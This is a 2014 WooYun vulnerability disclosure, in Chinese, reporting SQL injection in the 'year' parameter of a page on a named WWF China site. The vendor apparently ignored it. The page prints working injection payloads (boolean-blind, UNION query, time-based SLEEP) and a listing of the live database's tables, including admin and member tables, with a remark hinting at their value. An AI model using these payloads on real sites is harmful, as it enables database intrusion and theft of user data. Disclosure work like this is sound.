世界某自然基金会多处SQL注入 | wooyun-2014-070470| WooYun.org

当前位置：WooYun >> 漏洞信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-070470

漏洞标题：世界某自然基金会多处SQL注入

相关厂商：世界自然基金会官网

漏洞作者：招收技术员

提交时间：2014-07-31 15:55

修复时间：2014-09-14 15:56

公开时间：2014-09-14 15:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-07-31：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-09-14：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

某基金会多处SQL注入

详细说明：

多处SQL注入:http://www.wwfchina.org/camp-progress.php?year=2014

漏洞证明：

Place: GET
Parameter: year
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: year=2014 AND 9430=9430
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: year=2014 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7a646a3a,0x4c
5a64674a436c6e4b48,0x3a6d747a3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: year=2014 AND SLEEP(5)
Database: wwfchina
[42 tables]
+---------------------------------------+
| campaign_iwtc |
| campaign_waa2012city |
| campaign_waa2012user |
| feedback |
| fox_adminuser |
| fox_campaign |
| fox_category |
| fox_config |
| fox_intro |
| fox_job |
| fox_media |
| fox_media_type |
| fox_news |
| fox_newsletter |
| fox_office |
| fox_pandapal |
| fox_print |
| fox_project |
| fox_publication |
| fox_special |
| fox_specialdetail |
| fox_sponsor |
| fox_staff |
| fox_story |
| fox_video |
| fox_wallpaper |
| fox_wiki |
| fox_wikiattachment |
| fox_wwfaction |
| home_info |
| oldpublication |
| pandapal_survey |
| qqimport |
| signup |
| volunteer |
| volunteer_option_work |
| volunteer_worklog |
| weibouser |
| wwf_member |
| wwfmember |
| wwfmembertemp |
| wwfpress |
+---------------------------------------+
Database: information_schema
[40 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
adminuser and member 你懂的！

修复方案：

过滤把！

版权声明：转载请注明来源招收技术员@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝